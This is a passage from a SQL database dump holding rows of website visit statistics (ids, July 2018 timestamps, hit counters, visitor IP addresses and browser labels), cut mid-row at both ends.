),(270789,1531202124,1,1,0,0,'178.154.171.88','other'),(270790,1531202145,1,1,0,0,'54.36.148.182','other'),(270791,1531202380,1,1,0,0,'195.64.136.162','chrome'),(270792,1531202422,1,1,0,0,'54.36.148.43','other'),(270793,1531202628,1,1,0,0,'54.36.148.101','other'),(270794,1531202820,1,1,0,0,'54.36.148.204','other'),(270795,1531203091,1,1,0,0,'8.29.198.25','other'),(270796,1531203422,1,0,1,0,'66.249.69.185',''),(270797,1531203705,3,3,0,0,'91.196.178.68','chrome'),(270798,1531203715,1,1,0,0,'54.36.149.42','other'),(270799,1531204180,1,1,0,0,'54.36.149.2','other'),(270800,1531204316,1,1,0,0,'54.36.148.153','other'),(270801,1531204333,1,1,0,0,'54.36.149.19','other'),(270802,1531204423,1,1,0,0,'95.135.84.91','firefox'),(270803,1531204559,1,1,0,0,'54.36.148.193','other'),(270804,1531204591,2,2,0,0,'176.122.115.229','chrome'),(270805,1531204594,1,1,0,0,'54.36.148.75','other'),(270806,1531204645,1,1,0,0,'54.36.148.152','other'),(270807,1531204729,1,1,0,0,'54.36.148.203','other'),(270808,1531204841,1,1,0,0,'54.36.149.48','other'),(270809,1531205070,1,1,0,0,'216.244.66.241','other'),(270810,1531205136,2,2,0,0,'91.196.178.169','chrome'),(270811,1531205263,1,1,0,0,'54.36.148.185','other'),(270812,1531205455,1,1,0,0,'54.36.148.167','other'),(270813,1531205758,1,1,0,0,'54.36.148.238','other'),(270814,1531206279,1,0,1,0,'66.249.69.189',''),(270815,1531206534,1,1,0,0,'141.8.142.74','other'),(270816,1531206906,1,1,0,0,'54.36.149.64','other'),(270817,1531207106,1,1,0,0,'54.36.148.207','other'),(270818,1531207110,1,1,0,0,'8.29.198.27','other'),(270819,1531207901,1,1,0,0,'141.8.142.74','other'),(270820,1531208240,1,1,0,0,'54.36.148.162','other'),(270821,1531208269,1,1,0,0,'54.36.148.15','other'),(270822,1531208289,1,0,1,0,'66.249.69.189',''),(270823,1531208319,2,2,0,0,'91.196.178.68','chrome'),(270824,1531208372,1,1,0,0,'54.36.149.44','other'),(270825,1531208471,1,1,0,0,'54.36.148.119','other'),(270826,1531208793,1,1,0,0,'178.92.238.20','chrome'),(270827,1531209036,3,3,0,0,'69.58.178.56','other'),(270828,1531209068,1,1,0,0,'54.36.149.4','other'),(270829,1531209191,1,1,0,0,'141.8.142.74','other'),(270830,1531209236,1,1,0,0,'95.135.84.91','firefox'),(270831,1531209316,1,1,0,0,'54.36.148.183','other'),(270832,1531209491,1,1,0,0,'54.36.148.122','other'),(270833,1531209804,1,0,1,0,'66.249.69.228',''),(270834,1531209936,1,1,0,0,'54.36.148.175','other'),(270835,1531209939,1,1,0,0,'54.36.148.174','other'),(270836,1531210033,1,1,0,0,'46.219.121.3','chrome'),(270837,1531210237,1,1,0,0,'178.154.171.88','other'),(270838,1531210340,2,2,0,0,'141.8.142.74','other'),(270839,1531210661,2,2,0,0,'178.95.248.143','chrome'),(270840,1531211063,2,2,0,0,'54.36.148.207','other'),(270841,1531211101,1,1,0,0,'46.219.121.3','chrome'),(270842,1531211153,1,1,0,0,'31.43.31.58','chrome'),(270843,1531211157,1,0,1,0,'66.249.69.230',''),(270844,1531211200,1,1,0,0,'92.112.223.93','chrome'),(270845,1531211335,1,0,1,0,'66.249.69.232',''),(270846,1531211351,1,0,1,0,'66.249.69.228',''),(270847,1531211543,1,1,0,0,'54.36.148.210','other'),(270848,1531211619,2,2,0,0,'216.244.66.241','other'),(270849,1531211750,2,2,0,0,'178.154.171.88','other'),(270850,1531211784,1,1,0,0,'54.36.148.124','other'),(270851,1531211959,1,1,0,0,'54.36.148.118','other'),(270852,1531211993,2,2,0,0,'199.58.86.211','other'),(270853,1531212084,1,1,0,0,'176.111.246.13','chrome'),(270854,1531212280,1,1,0,0,'54.36.148.18','other'),(270855,1531212281,1,1,0,0,'54.36.148.217','other'),(270856,1531212440,1,1,0,0,'66.249.81.195','chrome'),(270857,1531212448,1,1,0,0,'54.36.149.98','other'),(270858,1531212498,1,1,0,0,'66.249.81.200','chrome'),(270859,1531212548,1,1,0,0,'216.244.66.241','other'),(270860,1531212686,1,1,0,0,'54.36.148.75','other'),(270861,1531212736,1,1,0,0,'54.36.148.153','other'),(270862,1531212946,2,2,0,0,'141.8.142.74','other'),(270863,1531213061,1,1,0,0,'54.36.148.178','other'),(270864,1531213149,1,1,0,0,'176.120.99.194','chrome'),(270865,1531213220,1,1,0,0,'54.36.149.31','other'),(270866,1531213658,1,1,0,0,'54.36.149.73','other'),(270867,1531213946,1,1,0,0,'8.29.198.26','other'),(270868,1531214242,1,1,0,0,'91.124.182.170','firefox'),(270869,1531214460,4,4,0,0,'91.196.178.66','chrome'),(270870,1531214546,1,1,0,0,'54.36.148.70','other'),(270871,1531214608,1,0,1,0,'66.249.69.187',''),(270872,1531214972,1,0,1,0,'66.249.69.185',''),(270873,1531215051,1,0,1,0,'66.249.69.230',''),(270874,1531215060,1,1,0,0,'54.36.148.33','other'),(270875,1531215168,2,0,2,0,'66.249.69.189',''),(270876,1531215283,1,1,0,0,'62.210.101.101','other'),(270877,1531215382,1,1,0,0,'185.176.110.191','chrome'),(270878,1531215388,2,2,0,0,'91.196.178.66','chrome'),(270879,1531215571,1,1,0,0,'82.196.9.227','chrome'),(270880,1531215783,1,1,0,0,'54.36.149.94','other'),(270881,1531215793,1,1,0,0,'54.36.148.247','other'),(270882,1531215872,1,1,0,0,'54.36.148.128','other'),(270883,1531215949,1,0,1,0,'66.249.69.187',''),(270884,1531215986,1,0,1,0,'66.249.69.228',''),(270885,1531216364,1,1,0,0,'54.36.148.135','other'),(270886,1531216532,1,1,0,0,'54.36.149.79','other'),(270887,1531216674,1,1,0,0,'141.8.142.74','other'),(270888,1531216685,2,2,0,0,'216.244.66.241','other'),(270889,1531217116,1,1,0,0,'54.36.148.132','other'),(270890,1531217240,3,3,0,0,'95.163.255.117','other'),(270891,1531217246,3,3,0,0,'95.163.255.115','other'),(270892,1531217365,1,1,0,0,'62.80.160.24','firefox'),(270893,1531217426,1,1,0,0,'91.196.178.102','chrome'),(270894,1531217933,1,1,0,0,'54.36.148.223','other'),(270895,1531217948,1,1,0,0,'8.29.198.26','other'),(270896,1531217967,1,1,0,0,'216.244.66.241','other'),(270897,1531218007,1,0,1,0,'66.249.69.232',''),(270898,1531218174,1,1,0,0,'54.36.149.69','other'),(270899,1531218393,1,1,0,0,'54.36.149.13','other'),(270900,1531218700,1,1,0,0,'141.8.142.74','other'),(270901,1531218766,1,0,1,0,'66.249.69.189',''),(270902,1531218925,1,1,0,0,'54.36.148.109','other'),(270903,1531218955,1,1,0,0,'54.36.148.182','other'),(270904,1531218984,1,1,0,0,'91.196.178.135','firefox'),(270905,1531219192,1,1,0,0,'31.148.29.2','firefox'),(270906,1531219583,1,1,0,0,'54.36.148.219','other'),(270907,1531219666,2,0,2,0,'66.249.69.187',''),(270908,1531219777,1,1,0,0,'54.36.149.105','other'),(270909,1531219883,1,1,0,0,'54.36.148.234','other'),(270910,1531219937,1,1,0,0,'141.8.142.74','other'),(270911,1531219961,5,5,0,0,'216.244.66.241','other'),(270912,1531220075,1,0,1,0,'66.249.69.185',''),(270913,1531220114,1,1,0,0,'54.36.148.166','other'),(270914,1531220135,1,1,0,0,'176.103.214.53','chrome'),(270915,1531220182,1,1,0,0,'54.36.149.88','other'),(270916,1531220404,1,1,0,0,'54.36.149.37','other'),(270917,1531220564,1,1,0,0,'185.176.110.191','chrome'),(270918,1531221066,1,1,0,0,'216.244.66.241','other'),(270919,1531221152,1,1,0,0,'54.36.149.85','other'),(270920,1531221413,1,1,0,0,'92.112.223.93','chrome'),(270921,1531221643,1,1,0,0,'95.30.17.145','msie'),(270922,1531221899,1,1,0,0,'91.196.178.88','chrome'),(270923,1531222028,1,1,0,0,'216.244.66.241','other'),(270924,1531222089,1,1,0,0,'54.36.149.105','other'),(270925,1531222125,1,1,0,0,'54.36.148.119','other'),(270926,1531222203,2,2,0,0,'91.196.178.169','chrome'),(270927,1531222226,1,1,0,0,'54.36.148.226','other'),(270928,1531222232,1,1,0,0,'54.36.149.43','other'),(270929,1531222300,2,2,0,0,'91.196.177.46','chrome'),(270930,1531222477,1,1,0,0,'173.249.2.90','other'),(270931,1531222515,1,1,0,0,'178.93.12.192','chrome'),(270932,1531222721,1,1,0,0,'54.36.148.220','other'),(270933,1531222840,1,1,0,0,'77.93.44.6','chrome'),(270934,1531222926,1,1,0,0,'92.112.223.93','chrome'),(270935,1531222995,1,1,0,0,'91.196.178.91','chrome'),(270936,1531223072,1,1,0,0,'54.36.148.252','other'),(270937,1531223131,1,1,0,0,'54.36.148.20','other'),(270938,1531223133,1,1,0,0,'54.36.148.74','other'),(270939,1531223164,1,1,0,0,'54.36.148.85','other'),(270940,1531223289,1,0,1,0,'66.249.69.185',''),(270941,1531223472,1,1,0,0,'54.36.148.219','other'),(270942,1531223557,1,1,0,0,'54.36.149.105','other'),(270943,1531223698,1,1,0,0,'37.9.113.182','other'),(270944,1531224342,1,1,0,0,'54.36.149.4','other'),(270945,1531224633,1,1,0,0,'54.36.149.54','other'),(270946,1531224785,1,1,0,0,'8.29.198.25','other'),(270947,1531224823,1,1,0,0,'216.244.66.241','other'),(270948,1531224839,1,1,0,0,'92.112.223.93','chrome'),(270949,1531224964,1,1,0,0,'54.36.149.20','other'),(270950,1531225514,1,1,0,0,'141.8.142.74','other'),(270951,1531225818,1,0,1,0,'66.249.69.189',''),(270952,1531225886,2,2,0,0,'91.196.177.46','chrome'),(270953,1531225990,1,0,1,0,'66.249.69.185',''),(270954,1531226021,1,1,0,0,'54.36.148.17','other'),(270955,1531226033,1,1,0,0,'176.108.5.254','chrome'),(270956,1531226034,1,1,0,0,'54.36.148.150','other'),(270957,1531226080,1,1,0,0,'54.36.148.219','other'),(270958,1531226234,1,1,0,0,'54.36.148.143','other'),(270959,1531226288,1,1,0,0,'54.36.148.207','other'),(270960,1531226425,1,1,0,0,'46.219.121.3','chrome'),(270961,1531226519,1,1,0,0,'95.134.235.165','chrome'),(270962,1531226720,1,1,0,0,'54.36.148.225','other'),(270963,1531226789,1,1,0,0,'91.227.206.12','chrome'),(270964,1531226848,1,0,1,0,'66.249.69.189',''),(270965,1531226930,1,1,0,0,'91.196.178.85','firefox'),(270966,1531226939,1,1,0,0,'54.36.149.104','other'),(270967,1531226941,1,1,0,0,'54.36.148.155','other'),(270968,1531227397,1,1,0,0,'54.36.149.99','other'),(270969,1531227631,1,1,0,0,'168.235.201.61','other'),(270970,1531227851,1,1,0,0,'37.55.78.241','chrome'),(270971,1531227907,1,0,1,0,'66.249.69.189',''),(270972,1531227950,1,1,0,0,'52.53.201.78','chrome'),(270973,1531227989,2,2,0,0,'216.244.66.241','other'),(270974,1531228028,1,1,0,0,'54.36.148.183','other'),(270975,1531228185,2,2,0,0,'78.154.167.40','chrome'),(270976,1531228405,1,1,0,0,'54.36.148.37','other'),(270977,1531228529,1,1,0,0,'54.36.148.108','other'),(270978,1531228533,1,1,0,0,'54.36.149.88','other'),(270979,1531228551,1,1,0,0,'157.55.39.100','other'),(270980,1531228557,1,1,0,0,'54.36.148.196','other'),(270981,1531228589,1,0,1,0,'66.249.69.187',''),(270982,1531228643,1,1,0,0,'178.95.66.69','chrome'),(270983,1531228701,1,1,0,0,'54.36.149.84','other'),(270984,1531228798,1,1,0,0,'8.29.198.26','other'),(270985,1531229443,1,1,0,0,'54.36.148.74','other'),(270986,1531229490,1,1,0,0,'54.36.148.226','other'),(270987,1531229527,1,0,1,0,'66.249.69.189',''),(270988,1531229657,2,2,0,0,'216.244.66.241','other'),(270989,1531229725,1,1,0,0,'144.76.186.38','other'),(270990,1531229735,1,1,0,0,'193.161.14.231','chrome'),(270991,1531229900,1,1,0,0,'54.36.148.70','other'),(270992,1531229910,1,1,0,0,'54.36.149.5','other'),(270993,1531230243,1,1,0,0,'54.36.148.84','other'),(270994,1531230471,1,1,0,0,'178.154.171.88','other'),(270995,1531230495,1,1,0,0,'92.112.220.87','chrome'),(270996,1531230668,1,1,0,0,'95.132.20.148','firefox'),(270997,1531230762,1,1,0,0,'54.36.149.101','other'),(270998,1531231057,1,1,0,0,'195.201.86.156','other'),(270999,1531231106,1,1,0,0,'54.36.148.82','other'),(271000,1531231206,1,1,0,0,'37.55.158.118','chrome'),(271001,1531231417,2,0,2,0,'66.249.69.185',''),(271002,1531231450,1,1,0,0,'54.36.148.230','other'),(271003,1531231791,1,1,0,0,'54.36.148.175','other'),(271004,1531231961,1,1,0,0,'157.55.39.213','other'),(271005,1531232396,1,1,0,0,'216.244.66.241','other'),(271006,1531232430,2,2,0,0,'91.196.178.169','chrome'),(271007,1531232577,1,0,1,0,'66.249.69.228',''),(271008,1531232844,1,1,0,0,'91.196.177.46','chrome'),(271009,1531233102,1,1,0,0,'54.36.149.48','other'),(271010,1531233209,1,0,1,0,'66.249.69.187',''),(271011,1531233304,1,1,0,0,'157.55.39.213','other'),(271012,1531233315,1,1,0,0,'54.36.148.209','other'),(271013,1531233385,1,1,0,0,'216.244.66.241','other'),(271014,1531233471,1,1,0,0,'54.36.149.49','other'),(271015,1531233677,1,0,1,0,'66.249.69.185',''),(271016,1531233683,1,1,0,0,'54.36.148.93','other'),(271017,1531233715,1,1,0,0,'54.36.148.142','other'),(271018,1531233927,1,1,0,0,'141.8.142.74','other'),(271019,1531233963,1,1,0,0,'54.36.149.59','other'),(271020,1531234201,1,1,0,0,'54.36.149.96','other'),(271021,1531234556,1,1,0,0,'54.36.148.228','other'),(271022,1531234657,3,3,0,0,'216.244.66.241','other'),(271023,1531235632,1,1,0,0,'8.29.198.26','other'),(271024,1531235879,1,1,0,0,'216.244.66.241','other'),(271025,1531235923,1,1,0,0,'54.36.149.68','other'),(271026,1531236326,2,2,0,0,'62.149.10.10','other'),(271027,1531236328,2,2,0,0,'78.26.151.61','chrome'),(271028,1531236361,1,1,0,0,'54.36.148.24','other'),(271029,1531236389,1,1,0,0,'31.13.113.197','other'),(271030,1531236398,2,2,0,0,'141.8.142.74','other'),(271031,1531236465,1,1,0,0,'31.13.114.145','other'),(271032,1531236495,1,1,0,0,'31.13.114.8','other'),(271033,1531236499,1,1,0,0,'54.36.149.20','other'),(271034,1531237028,1,1,0,0,'54.36.148.25','other'),(271035,1531237036,1,1,0,0,'178.92.238.34','chrome'),(271036,1531237156,1,1,0,0,'54.36.148.137','other'),(271037,1531237494,1,1,0,0,'91.196.178.102','chrome'),(271038,1531237598,1,0,1,0,'66.249.69.230',''),(271039,1531237738,1,1,0,0,'54.36.148.207','other'),(271040,1531238060,1,1,0,0,'216.244.66.241','other'),(271041,1531238250,1,0,1,0,'66.249.69.187',''),(271042,1531238327,1,1,0,0,'91.196.178.68','firefox'),(271043,1531238363,1,1,0,0,'54.36.149.102','other'),(271044,1531238823,1,1,0,0,'178.154.171.88','other'),(271045,1531238826,1,1,0,0,'141.8.142.74','other'),(271046,1531239021,1,1,0,0,'54.36.148.68','other'),(271047,1531239059,1,1,0,0,'54.36.148.118','other'),(271048,1531239214,1,1,0,0,'54.36.148.197','other'),(271049,1531239229,2,0,2,0,'66.249.69.185',''),(271050,1531239355,1,1,0,0,'54.36.148.109','other'),(271051,1531239418,1,1,0,0,'46.98.20.172','chrome'),(271052,1531239642,1,1,0,0,'8.29.198.25','other'),(271053,1531239762,1,1,0,0,'136.243.82.105','other'),(271054,1531239823,1,1,0,0,'69.12.66.200','chrome'),(271055,1531240065,1,1,0,0,'66.249.69.230','chrome'),(271056,1531240229,1,1,0,0,'178.154.171.88','other'),(271057,1531240275,2,0,2,0,'66.249.69.189',''),(271058,1531240486,2,2,0,0,'91.196.178.168','chrome'),(271059,1531240513,1,1,0,0,'54.36.149.9','other'),(271060,1531240517,1,1,0,0,'54.36.148.202','other'),(271061,1531240821,1,1,0,0,'54.36.148.126','other'),(271062,1531240969,2,2,0,0,'92.113.189.235','chrome'),(271063,1531241026,2,2,0,0,'216.244.66.241','other'),(271064,1531241103,1,1,0,0,'54.36.148.24','other'),(271065,1531241722,1,1,0,0,'141.8.142.74','other'),(271066,1531242283,1,0,1,0,'66.249.69.232',''),(271067,1531242333,1,0,1,0,'66.249.69.187',''),(271068,1531243217,2,2,0,0,'92.113.189.235','chrome'),(271069,1531243779,1,1,0,0,'37.73.150.224','chrome'),(271070,1531244026,1,1,0,0,'95.163.255.184','other'),(271071,1531244043,1,1,0,0,'178.154.171.88','other'),(271072,1531244046,1,1,0,0,'87.250.224.46','other'),(271073,1531244552,1,1,0,0,'141.8.142.74','other'),(271074,1531244694,1,1,0,0,'188.230.43.254','other'),(271075,1531245022,1,1,0,0,'95.163.255.179','other'),(271076,1531245492,1,0,1,0,'66.249.69.228',''),(271077,1531245821,1,0,1,0,'66.249.69.185',''),(271078,1531246482,1,1,0,0,'8.29.198.26','other'),(271079,1531246551,1,1,0,0,'51.255.66.115','other'),(271080,1531246585,1,1,0,0,'216.244.66.241','other'),(271081,1531246748,2,2,0,0,'91.196.178.66','chrome'),(271082,1531246924,1,0,1,0,'66.249.69.228',''),(271083,1531246987,2,2,0,0,'92.113.189.235','chrome'),(271084,1531247080,1,1,0,0,'188.230.43.254','other'),(271085,1531247448,1,1,0,0,'141.8.142.74','other'),(271086,1531247631,2,0,2,0,'66.249.69.185',''),(271087,1531248785,1,1,0,0,'91.196.178.45','chrome'),(271088,1531248890,1,1,0,0,'61.154.29.222','other'),(271089,1531249051,2,2,0,0,'216.244.66.241','other'),(271090,1531249484,1,1,0,0,'188.230.43.254','other'),(271091,1531249888,1,0,1,0,'66.249.69.187',''),(271092,1531250407,1,1,0,0,'54.36.148.178','other'),(271093,1531250484,1,1,0,0,'8.29.198.27','other'),(271094,1531250545,1,1,0,0,'54.36.148.151','other'),(271095,1531250721,1,1,0,0,'95.163.255.185','other'),(271096,1531250900,1,1,0,0,'54.36.148.114','other'),(271097,1531250910,1,1,0,0,'54.36.148.71','other'),(271098,1531250954,1,1,0,0,'54.36.149.61','other'),(271099,1531251377,1,1,0,0,'54.36.148.101','other'),(271100,1531251515,1,1,0,0,'54.36.148.89','other'),(271101,1531251596,1,1,0,0,'54.36.149.59','other'),(271102,1531251694,2,0,2,0,'66.249.69.189',''),(271103,1531251894,1,1,0,0,'188.230.43.254','other'),(271104,1531252077,1,1,0,0,'141.8.142.74','other'),(271105,1531252265,1,1,0,0,'54.36.148.255','other'),(271106,1531252839,1,1,0,0,'54.36.148.28','other'),(271107,1531252892,1,0,1,0,'66.249.69.187',''),(271108,1531252998,1,1,0,0,'54.36.148.203','other'),(271109,1531253134,1,1,0,0,'54.36.149.7','other'),(271110,1531253144,1,1,0,0,'54.36.149.88','other'),(271111,1531253354,1,1,0,0,'54.36.148.49','other'),(271112,1531253570,1,1,0,0,'54.36.148.80','other'),(271113,1531254244,1,1,0,0,'95.135.98.161','chrome'),(271114,1531254284,1,1,0,0,'188.230.43.254','other'),(271115,1531254325,1,1,0,0,'216.244.66.241','other'),(271116,1531254351,1,1,0,0,'54.36.149.105','other'),(271117,1531254416,1,1,0,0,'54.36.148.86','other'),(271118,1531254425,1,1,0,0,'54.36.149.45','other'),(271119,1531254619,1,1,0,0,'178.154.171.88','other'),(271120,1531255247,1,1,0,0,'54.36.148.144','other'),(271121,1531255250,1,1,0,0,'54.36.149.13','other'),(271122,1531255277,1,1,0,0,'157.55.39.97','other'),(271123,1531255281,6,6,0,0,'40.77.167.53','other'),(271124,1531255291,1,1,0,0,'54.36.148.211','other'),(271125,1531255465,1,1,0,0,'54.36.149.52','other'),(271126,1531255568,1,1,0,0,'54.36.148.131','other'),(271127,1531255823,1,1,0,0,'54.36.148.29','other'),(271128,1531255829,1,1,0,0,'54.36.148.206','other'),(271129,1531255865,1,0,1,0,'66.249.69.232',''),(271130,1531255915,2,2,0,0,'216.244.66.241','other'),(271131,1531256032,1,1,0,0,'54.36.148.123','other'),(271132,1531256068,1,1,0,0,'66.249.69.187','chrome'),(271133,1531256183,1,1,0,0,'54.36.148.228','other'),(271134,1531256257,1,1,0,0,'95.163.255.177','other'),(271135,1531256539,1,1,0,0,'54.36.149.28','other'),(271136,1531256545,1,1,0,0,'54.36.149.31','other'),(271137,1531256680,1,1,0,0,'188.230.43.254','other'),(271138,1531256778,1,1,0,0,'95.135.98.161','chrome'),(271139,1531256913,1,1,0,0,'54.36.148.190','other'),(271140,1531256931,1,1,0,0,'54.36.148.78','other'),(271141,1531257129,2,2,0,0,'95.163.255.106','other'),(271142,1531257152,1,1,0,0,'95.163.255.103','other'),(271143,1531257176,1,1,0,0,'95.163.255.109','other'),(271144,1531257198,1,1,0,0,'95.163.255.118','other'),(271145,1531257217,1,1,0,0,'95.163.255.119','other'),(271146,1531257241,1,1,0,0,'54.36.148.220','other'),(271147,1531257256,1,1,0,0,'54.36.149.6','other'),(271148,1531257258,1,1,0,0,'95.163.255.107','other'),(271149,1531257273,3,3,0,0,'95.163.255.114','other'),(271150,1531257321,1,1,0,0,'8.29.198.26','other'),(271151,1531257628,1,1,0,0,'157.55.39.97','other'),(271152,1531257965,1,1,0,0,'54.36.149.13','other'),(271153,1531257982,1,1,0,0,'54.36.148.92','other'),(271154,1531258033,1,1,0,0,'54.36.148.86','other'),(271155,1531258081,1,1,0,0,'216.244.66.241','other'),(271156,1531258199,1,1,0,0,'54.36.148.49','other'),(271157,1531258546,1,1,0,0,'66.249.69.228','chrome'),(271158,1531258665,1,1,0,0,'188.230.43.254','other'),(271159,1531258675,1,1,0,0,'54.36.148.247','other'),(271160,1531259039,2,2,0,0,'216.244.66.241','other'),(271161,1531259143,1,1,0,0,'54.36.148.209','other'),(271162,1531259145,1,1,0,0,'54.36.148.59','other'),(271163,1531259160,1,1,0,0,'54.36.148.132','other'),(271164,1531259223,2,0,2,0,'66.249.69.185',''),(271165,1531259335,1,1,0,0,'54.36.148.200','other'),(271166,1531259336,1,1,0,0,'54.36.148.35','other'),(271167,1531259352,1,1,0,0,'54.36.149.83','other'),(271168,1531259441,1,1,0,0,'54.36.148.122','other'),(271169,1531259511,1,1,0,0,'54.36.148.78','other'),(271170,1531259548,1,1,0,0,'54.36.149.79','other'),(271171,1531259781,1,1,0,0,'54.36.148.91','other'),(271172,1531259821,1,1,0,0,'173.249.24.45','chrome'),(271173,1531259874,1,1,0,0,'54.36.149.14','other'),(271174,1531259922,2,0,2,0,'66.249.69.189',''),(271175,1531259936,1,1,0,0,'54.36.148.197','other'),(271176,1531260277,1,1,0,0,'95.135.98.161','chrome'),(271177,1531260294,1,1,0,0,'54.36.148.233','other'),(271178,1531260371,1,1,0,0,'54.36.148.143','other'),(271179,1531260405,1,1,0,0,'54.36.148.149','other'),(271180,1531260707,1,1,0,0,'54.36.148.112','other'),(271181,1531260760,1,1,0,0,'54.36.148.130','other'),(271182,1531260900,1,1,0,0,'54.36.148.165','other'),(271183,1531260909,1,1,0,0,'54.36.148.186','other'),(271184,1531261025,1,1,0,0,'54.36.148.107','other'),(271185,1531261238,1,1,0,0,'54.36.148.180','other'),(271186,1531261263,1,1,0,0,'54.36.149.69','other'),(271187,1531261324,1,1,0,0,'8.29.198.25','other'),(271188,1531261590,1,1,0,0,'216.244.66.241','other'),(271189,1531261628,1,0,1,0,'66.249.69.189',''),(271190,1531261736,1,1,0,0,'54.36.148.53','other'),(271191,1531261797,1,1,0,0,'54.36.148.225','other'),(271192,1531261827,1,1,0,0,'54.36.148.119','other'),(271193,1531261982,1,1,0,0,'54.36.148.186','other'),(271194,1531261998,1,1,0,0,'54.36.148.144','other'),(271195,1531262186,1,1,0,0,'54.36.149.16','other'),(271196,1531262287,1,1,0,0,'54.36.148.10','other'),(271197,1531262516,1,1,0,0,'54.36.148.57','other'),(271198,1531262528,1,1,0,0,'54.36.148.136','other'),(271199,1531262540,2,2,0,0,'54.36.148.131','other'),(271200,1531262605,1,0,1,0,'66.249.69.189',''),(271201,1531262655,1,1,0,0,'54.36.148.145','other'),(271202,1531262846,1,1,0,0,'54.36.148.226','other'),(271203,1531262867,2,2,0,0,'141.8.142.74','other'),(271204,1531262977,1,1,0,0,'54.36.148.182','other'),(271205,1531263022,1,1,0,0,'54.36.148.93','other'),(271206,1531263187,1,1,0,0,'178.154.171.88','other'),(271207,1531263279,1,1,0,0,'54.36.149.18','other'),(271208,1531263424,1,1,0,0,'54.36.148.54','other'),(271209,1531263459,1,1,0,0,'54.36.148.243','other'),(271210,1531263566,1,1,0,0,'66.249.69.230','chrome'),(271211,1531263748,1,1,0,0,'54.36.148.207','other'),(271212,1531263864,1,1,0,0,'54.36.148.167','other'),(271213,1531264087,1,1,0,0,'54.36.149.2','other'),(271214,1531264157,1,1,0,0,'54.36.148.47','other'),(271215,1531264388,1,1,0,0,'54.36.148.212','other'),(271216,1531264589,1,1,0,0,'54.36.149.12','other'),(271217,1531264642,1,1,0,0,'54.36.148.24','other'),(271218,1531264665,1,1,0,0,'54.36.149.97','other'),(271219,1531264906,1,1,0,0,'141.8.142.74','other'),(271220,1531265216,1,1,0,0,'54.36.149.27','other'),(271221,1531265308,1,1,0,0,'54.165.59.7','other'),(271222,1531265342,1,0,1,0,'66.249.69.232',''),(271223,1531265371,1,1,0,0,'54.36.148.116','other'),(271224,1531265608,1,1,0,0,'54.36.148.140','other'),(271225,1531265690,1,1,0,0,'54.36.149.99','other'),(271226,1531265803,1,1,0,0,'54.36.148.83','other'),(271227,1531265806,1,1,0,0,'91.209.11.236','other'),(271228,1531265955,1,1,0,0,'54.36.149.16','other'),(271229,1531266087,1,1,0,0,'54.36.148.215','other'),(271230,1531266354,1,1,0,0,'54.36.148.208','other'),(271231,1531266410,1,1,0,0,'141.8.142.74','other'),(271232,1531266774,1,1,0,0,'54.36.149.11','other'),(271233,1531266792,1,1,0,0,'54.36.148.135','other'),(271234,1531266886,1,1,0,0,'54.36.149.3','other'),(271235,1531266898,1,1,0,0,'54.36.149.61','other'),(271236,1531267190,1,0,1,0,'66.249.69.232',''),(271237,1531267214,1,1,0,0,'54.36.149.8','other'),(271238,1531267568,1,1,0,0,'54.36.149.50','other'),(271239,1531267614,1,1,0,0,'54.36.148.116','other'),(271240,1531267676,1,1,0,0,'54.36.148.224','other'),(271241,1531267724,1,1,0,0,'54.36.149.83','other'),(271242,1531267945,1,1,0,0,'178.154.171.88','other'),(271243,1531268133,2,2,0,0,'54.36.148.72','other'),(271244,1531268161,1,1,0,0,'8.29.198.25','other'),(271245,1531268766,1,1,0,0,'54.36.148.223','other'),(271246,1531268899,1,1,0,0,'216.244.66.241','other'),(271247,1531269786,1,1,0,0,'54.36.148.68','other'),(271248,1531269791,1,1,0,0,'66.249.69.228','chrome'),(271249,1531270149,1,1,0,0,'54.36.148.146','other'),(271250,1531270225,1,1,0,0,'54.36.148.147','other'),(271251,1531270428,1,1,0,0,'54.36.149.72','other'),(271252,1531270718,1,0,1,0,'66.249.69.230',''),(271253,1531271061,1,1,0,0,'54.36.149.86','other'),(271254,1531271330,1,1,0,0,'54.36.148.221','other'),(271255,1531271796,1,1,0,0,'54.36.148.164','other'),(271256,1531271933,1,1,0,0,'37.9.113.82','other'),(271257,1531272160,1,1,0,0,'8.29.198.25','other'),(271258,1531272250,1,1,0,0,'54.36.148.24','other'),(271259,1531272364,1,1,0,0,'54.36.149.96','other'),(271260,1531272382,2,0,2,0,'66.249.69.187',''),(271261,1531272631,2,2,0,0,'54.165.59.7','other'),(271262,1531272645,1,1,0,0,'54.36.148.189','other'),(271263,1531272807,1,1,0,0,'54.36.148.157','other'),(271264,1531273038,1,1,0,0,'54.36.148.78','other'),(271265,1531273091,1,1,0,0,'54.36.148.203','other'),(271266,1531273594,1,1,0,0,'54.36.148.225','other'),(271267,1531273971,1,1,0,0,'54.36.149.46','other'),(271268,1531274024,1,0,1,0,'66.249.69.185',''),(271269,1531274027,1,1,0,0,'54.36.148.116','other'),(271270,1531274234,1,1,0,0,'54.36.148.226','other'),(271271,1531274300,2,2,0,0,'216.244.66.241','other'),(271272,1531274368,1,1,0,0,'66.249.69.189','chrome'),(271273,1531274423,1,1,0,0,'54.36.148.30','other'),(271274,1531274605,2,2,0,0,'54.165.59.7','other'),(271275,1531274832,1,1,0,0,'54.36.148.241','other'),(271276,1531274927,1,1,0,0,'54.36.149.32','other'),(271277,1531275426,1,1,0,0,'54.36.148.188','other'),(271278,1531275668,1,1,0,0,'54.36.149.99','other'),(271279,1531275724,1,1,0,0,'54.36.148.109','other'),(271280,1531275947,1,0,1,0,'66.249.69.232',''),(271281,1531276145,1,1,0,0,'54.36.149.25','other'),(271282,1531276713,2,2,0,0,'216.244.66.241','other'),(271283,1531276826,1,1,0,0,'54.36.148.103','other'),(271284,1531276837,1,1,0,0,'54.36.148.26','other'),(271285,1531277073,1,1,0,0,'66.249.69.232','chrome'),(271286,1531277301,1,1,0,0,'54.36.149.61','other'),(271287,1531277336,1,1,0,0,'54.36.148.254','other'),(271288,1531277667,1,1,0,0,'54.36.148.181','other'),(271289,1531277795,1,1,0,0,'54.36.148.23','other'),(271290,1531277802,1,1,0,0,'54.36.148.238','other'),(271291,1531277804,2,0,2,0,'66.249.69.228',''),(271292,1531277929,1,1,0,0,'54.36.149.101','other'),(271293,1531278025,1,1,0,0,'54.36.149.49','other'),(271294,1531278216,1,1,0,0,'54.36.149.46','other'),(271295,1531278261,1,1,0,0,'54.36.148.163','other'),(271296,1531278763,1,1,0,0,'141.8.142.74','other'),(271297,1531278800,1,1,0,0,'54.36.148.251','other'),(271298,1531279008,1,1,0,0,'8.29.198.27','other'),(271299,1531279197,1,1,0,0,'216.244.66.241','other'),(271300,1531279491,1,1,0,0,'54.36.148.87','other'),(271301,1531279613,1,1,0,0,'54.36.149.31','other'),(271302,1531279667,1,1,0,0,'54.